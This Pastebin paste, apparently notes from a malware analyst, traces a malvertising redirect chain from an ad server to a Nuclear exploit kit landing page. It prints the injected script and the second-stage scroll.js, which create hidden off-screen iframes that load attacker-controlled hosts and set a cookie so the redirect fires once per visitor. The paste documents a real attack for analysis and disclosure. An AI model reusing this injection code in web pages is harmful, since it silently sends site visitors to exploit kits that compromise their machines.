Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Start of malicious redirect: ads1.thecitywire.com/www/delivery/ajs.php?zoneid=106&cb=2792446160&charset=utf-8&loc=http%3A//www.thecitywire.com/node/30992
- Injected code:
- document.write('<script>var page_object=document.createElement("iframe");page_object.setAttribute("src", "http://productions.WEWANTFOOTBALL.COM/js/scroll.js?ver=1.22.3204");page_object.style.position="absolute";page_object.style.left="-1000px";page_object.style.top="-1000px";page_object.style.width="100";page_object.style.height="100";document.body.appendChild(page_object);/* End Google Ads */</script>');
- Content of 'scroll.js':
- <html>
- <body>
- <script>
- function z() {
- var rutin = document.createElement("iframe");
- rutin.setAttribute("src", "http://issues.ewomentv.com/e487ce22x97wu.html");
- rutin.style.left = "-1250px";
- rutin.style.top = "-1250px";
- rutin.style.position = "absolute";
- rutin.style.width = "140";
- rutin.style.height = "100";
- document.body.appendChild(rutin);
- document.cookie = "nimrod=readed; max-age=32000; path=/"
- }
- if (document.cookie.indexOf("nimrod") == -1) {
- z()
- } else {}
- </script>
- </body>
- </html>
- Leads to Nuclear EK landing page:
- issues.ewomentv.com/e487ce22x97wu.html
Add Comment
Please, Sign In to add comment